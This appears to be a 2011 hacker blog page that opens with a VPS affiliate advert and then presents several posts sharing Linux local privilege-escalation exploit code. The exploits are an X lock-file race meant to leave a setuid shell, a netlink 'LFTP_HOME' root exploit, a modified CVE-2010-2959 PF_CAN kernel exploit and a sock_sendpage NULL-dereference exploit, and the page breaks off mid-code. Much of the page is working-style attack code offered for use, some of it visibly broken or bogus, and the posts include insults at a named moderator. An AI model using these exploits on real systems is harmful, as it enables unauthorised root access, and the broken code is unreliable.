Help pay for xds lawyer fees.
LR

VPS Hosting at 9.95 a/mo, VERY nice setups! Use AFF Link to get better deals/support!

Posted on 26th November 2011 in Android, Codes, Exploits, Papers, Uncategorized

SIGNUP HERE -> http://www.vr.org/aff.php?aff=551

Just to point out an awesome VPS hosting place, i currently have 2 boxes at, and who have the BEST customer support i have ever found!
The company is HostVirtual , a 11 location company, with datacenters opening now in Asia, wich is super-fast fiber lines.
Folks, this company is going places.. Also hosting warchall.net , and MANY other sites/shells!
They cater for all, have awesome service, and it is CLOUDS, you get what you pay for, they cannot cheat because xen-cloud, limits usage, accordingly…where openvz, does not. This is why, when your looking at your next Openvz box, check howmuch ram and burstable-ram you get..then check even… you will be shocked :>
This companys boxes are all Xeon QuadCore Highend side of town stuff, aweesome highspeed blades,all with extra fine DDoS protection!

Please use the AFFILIATE link http://www.vr.org/aff.php?aff=551 , and then you can use the hand of god to summon xd– on Efnet for support, or simply submit a ticket!

These boxes are worth it.. initial signup is only 4.31!
Existing customers, get 10% off each ‘instance’ wich is about 8bux for making another VPS… very handy :)

http://www.vr.org/aff.php?aff=551

comments: 3 » tags:

[28day or so] Xchmod converted so runs a chmodded tmporary shell at /tmp/sh by default (race condition mod, still in testing, but it does seem to be working..)

Posted on 25th November 2011 in Exploits

Hello fellow hax0rs!
I, the now banished-from-FDlists, am proud to have made it that far :>
Finally theyre scourge of crappage, will not bomb my damn inbox anymore and 0h wait, already les 20 bs emails.
That was best ever move, and, it will hopefully stay alive , coz i hate that fucker arse valdis and his stupid arse nonsense comments, he is a useless sit, really, secunia must be damn real hard up for moderators if they call him ANY kinda expert, he is a googledork: in one, all he does, is when you post topic, he will google it, with mutiple searchengines, and simply spit you the rubbich links he finds, like page 10 crap… wich is usually why it is about 10yrs out of date when he posts the infos :>
His opinions lack alot of substance, coz the fr cannot code, yet is put in charge of somewherer where, ultimately your code speaks for yourself…
Anyhow, here is some pressentz from santa XD !

// xb0rg.c – a modified and shell version of xchmod: gcc xb0rg.c -o xb0rg;chmod +x xb0rg;./xb0rg
// then: ls -l /bin/sh until it appears… then just cd /tmp/sh and ‘whoami’ and enjoy!

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <syscall.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>

#define XORG_BIN     "/usr/bin/X"
#define DISPLAY      ":1"

char *get_tty_number(void) {
char tty_name[128], *ptr;
memset(tty_name, '\0', sizeof(tty_name));
readlink("/proc/self/fd/4", tty_name, sizeof(tty_name));  // this seems to always be free..
if ((ptr = strstr(tty_name, "tty")))
return ptr + 3;
return NULL;
}

int launch_xorg_instance(void) {
int child_pid;
char *opt[] = { XORG_BIN, DISPLAY, NULL };
if ((child_pid = fork()) == 0) {
close(1);
close(2);
execve(XORG_BIN, opt, NULL);
_exit(0);
}
return child_pid;
}

void show_target_file(char *file) {
char cmd[524];
memset(cmd, '\0', sizeof(cmd));
sprintf(cmd, "ls -l %s", file);
memset(cmd2, '\0', sizeof(cmd2));
sprintf(cmd2, "su -", file);
system(cmd);
system(cmd2);
system(cmd3);
}

int main(int argc, char **argv) {
pid_t proc;
struct stat st;
int n, ret, vv, current_attempt = 800;
char target_file[128], lockfiletmp[20], lockfile[20], *ttyno;
if (argc < 2)
strcpy(target_file, "/tmp/sh");
else
strcpy(target_file, argv[1]);
sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1);
sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1);
if (stat(lockfile, &st) == 0) {
return 1;
}
symlink("/dontexist", lockfile);
memset(vv, '\0', sizeof(vv));
sprintf(vv, "chmod 4755 %s", file);
setuid(0);
setgid(0); // backup - failover
umask(077);
ttyno = get_tty_number();
while (--current_attempt) {
proc = launch_xorg_instance();
n = 0;
while (n++ < 10000)
if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
break;
if (ret == 0) {
syscall(SYS_kill, proc, SIGSTOP);
stat(lockfiletmp, &st);
if ((st.st_mode & 4) == 0)
break;
launch_xorg_instance();
sleep(2);
}
kill(proc, SIGKILL);
}
if (current_attempt == 0) {
printf("[-] Attack failed!\n");
if (!ttyno)
printf("[!] Try with console ownership: switch to a TTY* by using Ctrl-Alt-F[1-6] and try again.\n");
return 1;
}
launch_xorg_instance();
sleep(2);
if (stat(lockfiletmp, &st) == 0) {
return 1;
}
printf("[+] Creating symlink: (%s -> %s)\n", lockfiletmp,target_file);
symlink(target_file, lockfiletmp);
printf("[+] PID: %d resumed (SIGCONT sent)\n", proc);
kill(proc, SIGCONT);
usleep(30000);
stat(target_file, &st);
if (!(st.st_mode & 004)) {
printf("[-] Attack failed,yur rights are: %o ,yu could launch a simple attack from this uid shuld bypass many prots\n", st.st_mode);
return 1;
}
unlink(lockfile);
printf("[+] Attack worked: ls -l %s:\n", target_file);
show_target_file(target_file);
chdir("/tmp/sh");   // cd to our shell..
return 0;
}

Now it is ok and, still being played with on different distros.. as with, the universal bzip2 bug still is… theyre race conditions wich must have some failsafes, to get job done faster, ie; cron.,.
cheers,
xd–

comments: 0 » tags:

[100Day-(or-so)] NETLINK (Audit/Lftp_home)local root exploit #2

Posted on 25th November 2011 in Exploits

Netlink AUDIT localroot exploit
NETLINK / LFTP_HOME/LD_AUDIT BUG made from PoC and code for the netlink bug!
AWESOME PF_NETLINK 0verflow mixed with a local LFTP_HOME or LD_AUDIT could be replaced… for the payload etc..
Anyhow, have fun!

xd– / #Haxnet / #Haxshells free shells service (IPv6 all vhosts are m1n3 b4b1 !

/* netlink-lftp_home bug */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];
        char message[LONG_STRING];
        char *mp;
        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");
        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        address.nl_pid = atoi(argv[1]);
        address.nl_groups = 0;
        msg.msg_name = (void*)&address;
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;
        printf("-> PiD: %s\n",argv[1]);
        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
        mp = message;
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        mp += sprintf(mp, "LFTP_HOME=$ORIGIN exec /proc/self/fd/3") +1;
        printf("-> Writing payload ..\n");
        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);
        char *buf;
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);
        printf("-> Sending payload ..");
        sendmsg(socket_fd, &msg, 0);
        close(socket_fd);
        sleep(2);
        printf("-> Got root, setting up shell ..");
        setuid(0);
        setgid(0);
        execl("/bin/sh", "/bin/sh", (void*)0);
}
comments: 0 » tags:

[OLD] i-can-haz-MODHARDEN.c ~ PF_CAN – Modified/Working version by Admins@CrazyCoders

Posted on 24th November 2011 in Exploits

Now, this is interesting cuzzz… i fund older version ok, now, with qurter-nelson.c ,it seems that is very simple and easy, to trigger ONLY the bad code in the stack buffer overflow in the kernel.. now with this method we have a method wich is made to specially ONLY work, On ubuntu!
Thats the kernel_sym lookup bit.. so, i decided to search for a working version and wala!
I found it, albeit i had to modify and addin a header…still, it now seems to be working GOOD on ubuntu and more!

Have a gig …

/*
* i-CAN-haz-MODHARDEN+fixed-syms.c
* Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit +getsymbols fix
*
* Info:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959
* Ben Hawkes discovered an integer overflow in the Controller Area Network
* (CAN) subsystem when setting up frame content and filtering certain
* messages. An attacker could send specially crafted CAN traffic to crash
* the system or gain root privileges.
*
* Usage:
* $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
* $ ./i-can-haz-modharden
* ...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root)
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/utsname.h>

//#define PAGE_SIZE getpagesize()

#define SLUB "kmalloc-96"
#define ALLOCATION 96
#define FILLER 100

#ifndef PF_CAN
#define PF_CAN 29
#endif
#ifndef CAN_BCM
#define CAN_BCM 2
#endif

struct sockaddr_can {
sa_family_t can_family;
int can_ifindex;
union {
struct {
uint32_t rx_id, tx_id;
} tp;
} can_addr;
};
struct can_frame {
uint32_t can_id;
uint8_t can_dlc;
uint8_t data[8] __attribute__((aligned(8)));
};
struct bcm_msg_head {
uint32_t opcode;
uint32_t flags;
uint32_t count;
struct timeval ival1, ival2;
uint32_t can_id;
uint32_t nframes;
struct can_frame frames[0];
};
#define RX_SETUP 5
#define RX_DELETE 6
#define CFSIZ sizeof(struct can_frame)
#define MHSIZ sizeof(struct bcm_msg_head)
#define IPCMNI 32768
#define EIDRM 43
#define HDRLEN_KMALLOC 8

struct list_head {
struct list_head *next;
struct list_head *prev;
};
struct super_block {
struct list_head s_list;
unsigned int s_dev;
unsigned long s_blocksize;
unsigned char s_blocksize_bits;
unsigned char s_dirt;
uint64_t s_maxbytes;
void *s_type;
void *s_op;
void *dq_op;
void *s_qcop;
void *s_export_op;
unsigned long s_flags;
} super_block;
struct mutex {
unsigned int count;
unsigned int wait_lock;
struct list_head wait_list;
void *owner;
};
struct inode {
struct list_head i_hash;
struct list_head i_list;
struct list_head i_sb_list;
struct list_head i_dentry_list;
unsigned long i_ino;
unsigned int i_count;
unsigned int i_nlink;
unsigned int i_uid;
unsigned int i_gid;
unsigned int i_rdev;
uint64_t i_version;
uint64_t i_size;
unsigned int i_size_seqcount;
long i_atime_tv_sec;
long i_atime_tv_nsec;
long i_mtime_tv_sec;
long i_mtime_tv_nsec;
long i_ctime_tv_sec;
long i_ctime_tv_nsec;
uint64_t i_blocks;
unsigned int i_blkbits;
unsigned short i_bytes;
unsigned short i_mode;
unsigned int i_lock;
struct mutex i_mutex;
unsigned int i_alloc_sem_activity;
unsigned int i_alloc_sem_wait_lock;
struct list_head i_alloc_sem_wait_list;
void *i_op;
void *i_fop;
struct super_block *i_sb;
void *i_flock;
void *i_mapping;
char i_data[84];
void *i_dquot_1;
void *i_dquot_2;
struct list_head i_devices;
void *i_pipe_union;
unsigned int i_generation;
unsigned int i_fsnotify_mask;
void *i_fsnotify_mark_entries;
struct list_head inotify_watches;
struct mutex inotify_mutex;
} inode;
struct dentry {
unsigned int d_count;
unsigned int d_flags;
unsigned int d_lock;
int d_mounted;
void *d_inode;
struct list_head d_hash;
void *d_parent;
} dentry;
struct file_operations {
void *owner;
void *llseek;
void *read;
void *write;
void *aio_read;
void *aio_write;
void *readdir;
void *poll;
void *ioctl;
void *unlocked_ioctl;
void *compat_ioctl;
void *mmap;
void *open;
void *flush;
void *release;
void *fsync;
void *aio_fsync;
void *fasync;
void *lock;
void *sendpage;
void *get_unmapped_area;
void *check_flags;
void *flock;
void *splice_write;
void *splice_read;
void *setlease;
} op;
struct vfsmount {
struct list_head mnt_hash;
void *mnt_parent;
void *mnt_mountpoint;
void *mnt_root;
void *mnt_sb;
struct list_head mnt_mounts;
struct list_head mnt_child;
int mnt_flags;
const char *mnt_devname;
struct list_head mnt_list;
struct list_head mnt_expire;
struct list_head mnt_share;
struct list_head mnt_slave_list;
struct list_head mnt_slave;
struct vfsmount *mnt_master;
struct mnt_namespace *mnt_ns;
int mnt_id;
int mnt_group_id;
int mnt_count;
} vfsmount;
struct file {
struct list_head fu_list;
struct vfsmount *f_vfsmnt;
struct dentry *f_dentry;
void *f_op;
unsigned int f_lock;
unsigned long f_count;
} file;
struct kern_ipc_perm {
unsigned int lock;
int deleted;
int id;
unsigned int key;
unsigned int uid;
unsigned int gid;
unsigned int cuid;
unsigned int cgid;
unsigned int mode;
unsigned int seq;
void *security;
};
struct shmid_kernel {
struct kern_ipc_perm shm_perm;
struct file *shm_file;
unsigned long shm_nattch;
unsigned long shm_segsz;
time_t shm_atim;
time_t shm_dtim;
time_t shm_ctim;
unsigned int shm_cprid;
unsigned int shm_lprid;
void *mlock_user;
} shmid_kernel;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
int __attribute__((regparm(3)))
kernel_code(struct file *file, void *vma) {
commit_creds(prepare_kernel_cred(0));
return -1;
}

unsigned long get_symbol(char *name) { /* borrowed from one of the other codes wich actually, determines OS */
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen("/proc/kallsyms","r");
if (f == NULL) {
f = fopen("/proc/ksyms","r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy,sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr,sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n",sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to: %p%s ..\n", name,(void *)addr,rep?"(via System.map)":"");
fclose(f);
return addr;
}
}
fclose(f);
if (rep)
return 0;
fallback:
uname(&ver);
if (strncmp(ver.release, "2.6", 3))
oldstyle = 1;
sprintf(sname, "/boot/System.map-%s", ver.release); // this helps :P
f = fopen(sname, "r");
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}

int check_slabinfo(char *cache, int *active_out, int *total_out) {
FILE *fp;
char name[64], slab[256];
int active, total, diff;
memset(slab, 0, sizeof(slab));
memset(name, 0, sizeof(name));
fp = fopen("/proc/slabinfo", "r");
if (!fp) {
printf("[-] Sorry, /proc/slabinfo is not available!");
exit(1);
}
fgets(slab, sizeof(slab) - 1, fp);
while (1) {
fgets(slab, sizeof(slab) - 1, fp);
sscanf(slab, "%s %u %u", name, &active, &total);
diff = total - active;
if (strcmp(name, cache) == 0) {
break;
}
}
fclose(fp);
if (active_out) {
*active_out = active;
}
if (total_out) {
*total_out = total;
}
return diff;
}

void trigger(void) {
int *shmids;
int i, ret, sock, cnt, base, smashed;
int diff, active, total, active_new, total_new;
int len, sock_len, mmap_len;
struct sockaddr_can addr;
struct bcm_msg_head *msg;
void *efault;
char *buf;
printf("[+] Creating PF_CAN UDP socket ..\n");
sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
if (sock < 0) {
printf("[-] Kernel lacks CAN packet family support!\n");
exit(1);
}
printf("[+] Connecting PF_CAN socket ..\n");
memset(&addr, 0, sizeof(addr));
addr.can_family = PF_CAN;
ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
if (sock < 0) {
printf("[-] Couldnt connect CAN socket ..\n");
exit(1);
}
len = MHSIZ + (CFSIZ * (ALLOCATION/16));
msg = malloc(len);
memset(msg, 0, len);
msg->can_id = 2959;
msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;
printf("[+] Clearing out any active OPs via RX_DELETE ..\n");
msg->opcode = RX_DELETE;
ret = send(sock, msg, len, 0);
printf("[+] Removing any active user owned shmids ..\n");
system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid >/dev/null 2>&1; done;");
printf("[+] Massaging " SLUB " SLUB cache with dummy allocations ..\n");
diff = check_slabinfo(SLUB, &active, &total);
shmids = malloc(sizeof(int) * diff * 10);
cnt = diff * 10;
for (i = 0; i < cnt; ++i) {
diff = check_slabinfo(SLUB, &active, &total);
if (diff == 0) {
break;
}
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
base = i;
if (diff != 0) {
printf("[-] Inconsistency detected with SLUB cache allocation!\n");
exit(1);
}
printf("[+] Corrupting BCM OP with truncated allocation via RX_SETUP ..\n");
i = base;
cnt = i + FILLER;
for (; i < cnt; ++i) {
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
msg->opcode = RX_SETUP;
ret = send(sock, msg, len, 0);
if (ret < 0) {
printf("[-] Kernel rejected malformed CAN header ..\n");
exit(1);
}
i = base + FILLER;
cnt = i + FILLER;
for (; i < cnt; ++i) {
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
printf("[+] Mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec ..\n");
mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);
sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);
efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
//efault = mmap(PAGE_SIZE, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
printf("[+] Mmap'ed mapping of length: %d at: %p ..\n", mmap_len, efault);
printf("[+] Smashing adjacent shmid with dummy payload via malformed RX_SETUP ..\n");
msg = (struct bcm_msg_head *) efault;
memset(msg, 0, mmap_len);
msg->can_id = 2959;
msg->nframes = (ALLOCATION / 16) * 4;
msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf("[-] Couldnt trigger EFAULT ,aborting!\n");
exit(1);
}
printf("[+] Seeking out the smashed shmid_kernel ..\n");
i = base;
cnt = i + FILLER + FILLER;
for (; i < cnt; ++i) {
ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);
if (ret == -1 && errno == EIDRM) {
smashed = i;
break;
}
}
if (i == cnt) {
printf("[-] Couldnt find smashed shmid!\n");
exit(1);
}
printf("[+] Discovered our smashed shmid_kernel at: shmid[%d] = %d ..\n", i, shmids[i]);
printf("[+] Re-smashing the shmid_kernel with exploit payload ..\n");
shmid_kernel.shm_perm.seq = shmids[smashed]/IPCMNI;
buf = (char *) msg;
memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));
msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf("[-] Couldn't trigger EFAULT ,aborting!\n");
exit(1);
}
ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
if (ret == -1 && errno != EIDRM) {
setresuid(0, 0, 0);
setresgid(0, 0, 0);
printf("[+] Launching root shell!\n");
execl("/bin/sh", "/bin/sh", NULL);
exit(0);
}
printf("[-] Exploit failed!\n");
}

void setup(void) {
printf("[+] Looking for symbols ..\n");
commit_creds = (_commit_creds) get_symbol("commit_creds");
if (!commit_creds) {
printf("[-] Symbol table not availabe, aborting!\n");
}
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
if (!prepare_kernel_cred) {
printf("[-] Symbol table not availabe, aborting!\n");
}
printf("[+] Setting up payload ..\n");
super_block.s_flags = 0;
inode.i_size = 4096;
inode.i_sb = &super_block;
inode.inotify_watches.next = &inode.inotify_watches;
inode.inotify_watches.prev = &inode.inotify_watches;
inode.inotify_mutex.count = 1;
dentry.d_count = 4096;
dentry.d_flags = 4096;
dentry.d_parent = NULL;
dentry.d_inode = &inode;
op.mmap = &kernel_code;
op.get_unmapped_area = &kernel_code;
vfsmount.mnt_flags = 0;
vfsmount.mnt_count = 1;
file.fu_list.prev = &file.fu_list;
file.fu_list.next = &file.fu_list;
file.f_dentry = &dentry;
file.f_vfsmnt = &vfsmount;
file.f_op = &op;
shmid_kernel.shm_perm.key = IPC_PRIVATE;
shmid_kernel.shm_perm.uid = getuid();
shmid_kernel.shm_perm.gid = getgid();
shmid_kernel.shm_perm.cuid = getuid();
shmid_kernel.shm_perm.cgid = getgid();
shmid_kernel.shm_perm.mode = -1;
shmid_kernel.shm_file = &file;
}

int main(int argc, char **argv) {
setup();
trigger();
return 0;
}

Yep yep… old but.. hey, theres plenty more like this one…wich can work well with planned out and smart
mmap’ing ;)

xd– #Haxnet/#Haxshells FreeShell service (Yes free)! // Admin

comments: 2 » tags:

[OLD-UPDATED]: Linux sock_sendpage() NULL pointer deref x86_64/x86/x64/PPC and PPC64 (MMAP redone v2)+READ About using vmap()

Posted on 24th November 2011 in Codes, Exploits

Yea yea.. it is OLD!
Just notice, that playin abit with mmap vals,will get you root still..but,be creative ;) hint is given in-code..
Now the oladass c0de :P (Note the sendfile is done without using mmap/null ;)

FROM SOMEONE WHO WANTED TO KNOW WHY… So i have tried to explain things here,without editing the code,coz, that wont do… anyhow, i hope this explains a few things about mmap and vm,ap to those who dfo not yet get this sh1t.

i have checked 3 host ,not work to me, :
Linux xx.com 2.6.18-274.12.1.el5.centos.plus #1 SMP Tue Nov 29 18:16:47 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
t.c: In function ‘main’:
t.c:147: warning: passing argument 1 of ‘mmap’ makes pointer from integer without a cast

-> failed to mmap: Invalid argument

UPDATE: NOW only updated it because of a non working centos x86_64 ,so lets fix that back ok…this is easy….
We only did mess with PAGE_SIZE of mmap() right?
so first we do this,

// #define PAGE_SIZE getpagesize()  // PAGE_SIZE only need this if the kernel doesnt have header,so maybe // out to

so it wont use the internal mmap,wich, it would not matter anyhow, the exploit should STILL work, but anyhow there is 2 ways to address this last mmap bit…and thats to addin a static figure , some boxes, are mmap(4096,NULL().. ,whilst some, MUST be NULL,so, you might want to try using the NULL version of the exploit…wich can be found on many repos, and it is also disguised as sendpage 2010 or 2010 , i believe, i released that version compiled even, smwhere,working fine, heck, works for me, never really wtached for whatkernels but, i must admit, i had NOT tried this on a centos of late, but, we all know, this type of mmap() bug, well, most boxes block mmap() use ATALL in userland…those who dont will have some grsec or just, preventitive techniques wich make mapping it to NULL almost impossible… heck, if you want to offer another vector for this, like, i have considered to use vmap() wich someone from my channel did do and demonstrated that works,but also we have another mmap size(my bad i forgot this one, and it might actually work for centos) thats simply mmap(4096 * 2,NULL.. , same as rest of it… this is all you could to maybe with mmap,max values i think* but, on vmap, you only have i believe that value and NULL also yes, but, i have yet to try convert anything to use vmap, as it still sits where mmap() is in kernel world…wich is a very tough secure place..but, then again, as i said, i dont think this method, vmap() addr, has been used atall yet…and, could have been,. and, would probably A. not trigger ANYTHING the admins have set to kill any mmap(0 and even B. Bypass the grsec ACL, this is NOT the grsec kernel, the ACL… and maybe C. Bypass,or, just get to map the page, because the kernel sees what is usually, a very normal thing :s…so, yea, hell… good pint out to me in the comment, but, please, learn to use mmap() abit then ask me things like this :S lol..take care.
XD

/*
 *  Linux PF_UNIX or PF_BLUETOOTH sock_sendpage() NULL pointer deref x86_64/x86/x64/PPC and PPC64
 *  ****PF_UNIX socket-vector
 *
 * Exploit was tested on:
 * CentOS 5.7 (2.6.18-274.el5)
 * Red Hat Enterprise Linux 5.7 (2.6.18-274.6.1.el5)
 * SUSE Linux Enterprise Server 11 (2.6.27.19-5)
 * Ubuntu 11.10 (Latest 2011) - Mixed results,depends on the version of kernel.. 2.6.32.6 seems abit better
 *
 * For i386 and PPC i386, compile with the following command:
 * gcc -Wall -o sendpage sendpage.c
 * And for x86_64 and PPC64:
 * gcc -Wall -m64 -o sendpage sendpage.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <unistd.h>

#define PAGE_SIZE getpagesize()  // PAGE_SIZE only need this if the kernel doesnt have header,so maybe // out to

//#ifndef PF_UNIX
//#define PF_UNIX AF_UNIX
//#define AF_UNIX 11             // Adjust this... some boxes will want this IN
//#endif

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("movq %%rsp,%0; " : "=r" (sp));
	return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("movl %%esp,%0" : "=r" (sp));
	return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("mr %0,%%r1; " : "=r" (sp));
	return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct;
	asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
	return task_struct;
}
#else
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct, thread_info;
	thread_info = current_stack_pointer() & ~(4096 - 1);
	if (*(unsigned long *)thread_info >= 0xc0000000) {
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	}
	task_struct = current_stack_pointer() & ~(8192 - 1);
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	thread_info = task_struct;
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct, thread_info;
#if defined(__LP64__)
	task_struct = current_stack_pointer() & ~(16384 - 1);
#else
	task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	thread_info = task_struct;
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
	unsigned int *task_struct;
	task_struct = (unsigned int *)current_task_struct();
	while (task_struct) {
	if (task_struct[0] == uid && task_struct[1] == uid &&
	task_struct[2] == uid && task_struct[3] == uid &&
	task_struct[4] == gid && task_struct[5] == gid &&
	task_struct[6] == gid && task_struct[7] == gid) {
	task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] =task_struct[4] = task_struct[5] =
	task_struct[6] = task_struct[7] = 0;
	break;
	}
	task_struct++;
	}
	return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
	unsigned int *task_struct;
	task_struct = (unsigned int *)current_task_struct();
	while (task_struct) {
	if (!task_struct[0]) {
	task_struct++;
	continue;
	}
	if(task_struct[0]==task_struct[1]&&task_struct[0]==task_struct[2]&&
	task_struct[0]==task_struct[3]&&task_struct[4]==task_struct[5]&&
	task_struct[4]==task_struct[6]&&task_struct[4]==task_struct[7]) {
        task_struct[0]=task_struct[1]=task_struct[2]=task_struct[3]=task_struct[4]=
        task_struct[5]=task_struct[6]=task_struct[7]=0;
	break;
	}
	task_struct++;
	}
	return -1;
}
#endif

int main(void) {
	char *addr;
	int out_fd, in_fd;
	char template[] = "/tmp/fdlist.SUX";
#if defined(__i386__) || defined(__x86_64__)
	uid = getuid(), gid = getgid();
#endif
        if((addr=mmap(PAGE_SIZE,NULL,PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED){
	perror("-> failed to mmap");
	exit(EXIT_FAILURE);
	}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
	addr[0] = '\xff';
	addr[1] = '\x24';
	addr[2] = '\x25';
	*(unsigned long *)&addr[3] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
	addr[0] = '\xff';
	addr[1] = '\x25';
	*(unsigned long *)&addr[2] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
	*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
	addr[0] = '\x3f';
	addr[1] = '\xe0';
	*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
	addr[4] = '\x63';
	addr[5] = '\xff';
	*(unsigned short *)&addr[6] = (unsigned short)change_cred;
	addr[8] = '\x7f';
	addr[9] = '\xe9';
	addr[10] = '\x03';
	addr[11] = '\xa6';
	addr[12] = '\x4e';
